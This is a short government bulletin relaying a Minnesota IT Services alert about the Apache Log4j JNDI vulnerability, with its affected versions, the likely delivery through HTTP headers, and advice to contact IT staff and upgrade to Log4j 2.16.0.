 Be informed – Apache Log4j security vulnerability
This message is being sent to all deputy registrar offices and driver’s license agent offices on behalf of DPS-DVS.
On December 12, Minnesota IT Services (MNIT) issued a notice to local government partners about the Apache Log4J security vulnerability. Please see the information from MNIT below:
Situational Awareness – Critical Vulnerability: Apache Log4j
A critical vulnerability has been discovered in Apache Log4j – a widely used logging package for Java. The vulnerability resides in the JNDI lookup feature of the Log4j library. Successful exploitation of this vulnerability could allow for arbitrary code execution within the context of the systems and services that use the Java logging library, including several services and applications written in Java.
Systems Affected:
- Apache Log4j between versions 2.0 and 2.15.0.
Impact:
- According to numerous open-source reports, Log4j is used with Apache software like Apache Struts, Solr, Druid, along with other technologies. Many websites of manufacturers and providers have been found to be affected including Apple, Twitter, Steam, Tesla, Minecraft and more.
- Threat actors will likely include payloads in simple HTTP connections, either in a User-Agent header or trivial POST form data. In addition, it has been reported that organizations are already seeing signs of exploitation in the wild with further attempts on other websites likely.
Recommendations:
- If you have not yet done so, reach out to your IT support teams for assistance addressing this vulnerability.
- The Apache Software Foundation has released a security advisory and Log4j version 2.16.0 to address this critical vulnerability. Upgrade Log4j to version 2.16.0 as soon as possible.
Additional resources for more information:
The Common Vulnerabilities and Exposures system
Apache Log4j Vulnerability Guidance | CISA
Apache Advisory: Log4j
.
|
